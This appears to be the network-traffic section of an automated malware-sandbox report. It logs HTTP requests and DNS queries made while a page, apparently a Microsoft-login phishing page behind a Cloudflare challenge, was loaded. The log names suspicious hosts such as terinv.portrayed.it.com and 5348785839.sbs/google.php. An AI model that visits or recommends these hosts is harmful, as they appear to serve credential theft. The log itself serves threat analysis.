      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/xvsxb/0x4AAAAAABG0PtYy-qWsAZyT/auto/fbE/new/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeSec-Fetch-Storage-Access: activeReferer: https://terinv.portrayed.it.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=930c89eabd78adac&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/xvsxb/0x4AAAAAABG0PtYy-qWsAZyT/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/xvsxb/0x4AAAAAABG0PtYy-qWsAZyT/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: terinv.portrayed.it.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://terinv.portrayed.it.com/ieyeb/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=5ir4ie8nt6vuj3i380v4vnh3jr
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1837457641:1744727525:J7mElHGIE9MX1KbzUdL-JeojqYJYfiEXGVNMaur5k_0/930c89eabd78adac/FmcACnAP7263rH7bnAKnEqPPfKB9xmNrq0pU0uzGZmM-1744731598-1.1.1.1-IDzd2VIez2eUy_QMp631tdBgSOljj8l_PPoWcQ5gOBPEl6GFZqXn4UjaGDCSoKqg HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/d/930c89eabd78adac/1744731599793/b6bAAss2ZvlWZK7 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/xvsxb/0x4AAAAAABG0PtYy-qWsAZyT/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/d/930c89eabd78adac/1744731599793/b6bAAss2ZvlWZK7 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/930c89eabd78adac/1744731599796/1c1f611ef6273716802ea1a8d7f990018229fd501615d826c2bf7d6d37aadc62/ys1Mhcz1D9fG5Dv HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/xvsxb/0x4AAAAAABG0PtYy-qWsAZyT/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1837457641:1744727525:J7mElHGIE9MX1KbzUdL-JeojqYJYfiEXGVNMaur5k_0/930c89eabd78adac/FmcACnAP7263rH7bnAKnEqPPfKB9xmNrq0pU0uzGZmM-1744731598-1.1.1.1-IDzd2VIez2eUy_QMp631tdBgSOljj8l_PPoWcQ5gOBPEl6GFZqXn4UjaGDCSoKqg HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1837457641:1744727525:J7mElHGIE9MX1KbzUdL-JeojqYJYfiEXGVNMaur5k_0/930c89eabd78adac/FmcACnAP7263rH7bnAKnEqPPfKB9xmNrq0pU0uzGZmM-1744731598-1.1.1.1-IDzd2VIez2eUy_QMp631tdBgSOljj8l_PPoWcQ5gOBPEl6GFZqXn4UjaGDCSoKqg HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /bootstrap/4.1.3/js/bootstrap.min.js HTTP/1.1Host: stackpath.bootstrapcdn.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://terinv.portrayed.it.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /ajax/libs/popper.js/1.12.9/umd/popper.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveOrigin: https://terinv.portrayed.it.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://terinv.portrayed.it.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /bootstrap/4.0.0/js/bootstrap.min.js HTTP/1.1Host: maxcdn.bootstrapcdn.comConnection: keep-aliveOrigin: https://terinv.portrayed.it.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://terinv.portrayed.it.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /jquery-3.2.1.slim.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveOrigin: https://terinv.portrayed.it.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://terinv.portrayed.it.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /bootstrap.min.js HTTP/1.1Host: 5348785839-1317754460.cos.ap-seoul.myqcloud.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://terinv.portrayed.it.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /dxetjqzbe/image/upload/v1742052868/6059C6BA-9C9F-4199-8218-8895A9F0C3C8_ctielh.png HTTP/1.1Host: res.cloudinary.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://terinv.portrayed.it.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /dxetjqzbe/image/upload/v1742052868/6059C6BA-9C9F-4199-8218-8895A9F0C3C8_ctielh.png HTTP/1.1Host: res.cloudinary.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /google.php HTTP/1.1Host: 5348785839.sbsConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://terinv.portrayed.it.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /google.php HTTP/1.1Host: 5348785839.sbsConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /dbd5a2dd-n2kxueriy-dm8fhyf0anvulmvhi3kdbkkxqluuekyfc/logintenantbranding/0/illustration?ts=638640866037463663 HTTP/1.1Host: aadcdn.msauthimages.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://terinv.portrayed.it.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /dbd5a2dd-n2kxueriy-dm8fhyf0anvulmvhi3kdbkkxqluuekyfc/logintenantbranding/0/bannerlogo?ts=636783560697171089 HTTP/1.1Host: aadcdn.msauthimages.netConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://terinv.portrayed.it.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /dbd5a2dd-n2kxueriy-dm8fhyf0anvulmvhi3kdbkkxqluuekyfc/logintenantbranding/0/bannerlogo?ts=636783560697171089 HTTP/1.1Host: aadcdn.msauthimages.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /dbd5a2dd-n2kxueriy-dm8fhyf0anvulmvhi3kdbkkxqluuekyfc/logintenantbranding/0/illustration?ts=638640866037463663 HTTP/1.1Host: aadcdn.msauthimages.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /google.php HTTP/1.1Host: 5348785839.sbsConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficDNS traffic detected: DNS query: apex.oracle.com
      Source: global trafficDNS traffic detected: DNS query: static.oracle.com
      Source: global trafficDNS traffic detected: DNS query: www.google.com
      Source: global trafficDNS traffic detected: DNS query: terinv.portrayed.it.com
      Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
      Source: global trafficDNS traffic detected: DNS query: mailmeteor.com
      Source: global trafficDNS traffic detected: DNS query: code.jquery.com
      Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
      Source: global trafficDNS traffic detected: DNS query: maxcdn.bootstrapcdn.com
      Source: global trafficDNS traffic detected: DNS query: stackpath.bootstrapcdn.com
      Source: global trafficDNS traffic detected: DNS query: 5348785839-1317754460.cos.ap-seoul.myqcloud.com
      Source: global trafficDNS traffic detected: DNS query: 5348785839.sbs
      Source: global trafficDNS traffic detected: DNS query: res.cloudinary.com
      Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
      Source: global trafficDNS traffic detected: DNS query: aadcdn.msauthimages.net
      Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/b/flow/ov1/1837457641:1744727525:J7mElHGIE9MX1KbzUdL-JeojqYJYfiEXGVNMaur5k_0/930c89eabd78adac/FmcACnAP7263rH7bnAKnEqPPfKB9xmNrq0pU0uzGZmM-1744731598-1.1.1.1-IDzd2VIez2eUy_QMp631tdBgSOljj8l_PPoWcQ5gOBPEl6GFZqXn4UjaGDCSoKqg HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 3620sec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"Content-Type: text/plain;charset=UTF-8cf-chl: FmcACnAP7263rH7bnAKnEqPPfKB9xmNrq0pU0uzGZmM-1744731598-1.1.1.1-IDzd2VIez2eUy_QMp631tdBgSOljj8l_PPoWcQ5gOBPEl6GFZqXn4UjaGDCSoKqgcf-chl-ra: 0sec-ch-ua-mobile: ?0Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/xvsxb/0x4AAAAAABG0PtYy-qWsAZyT/auto/fbE/new/normal/auto/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Apr 2025 15:39:59 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeServer: cloudflareCache-Control: max-age=14400Cf-Cache-Status: EXPIREDCF-RAY: 930c89f25f8a3026-MIAalt-svc: h3=":443"; ma=86400
      Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
      Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
      Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
      Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
      Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
      Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
      Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
      Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
      Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49673
      Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
      Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
      Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
      Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
      Source: unknownNetwork traffic detected: HTTP traffic on port 49679 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
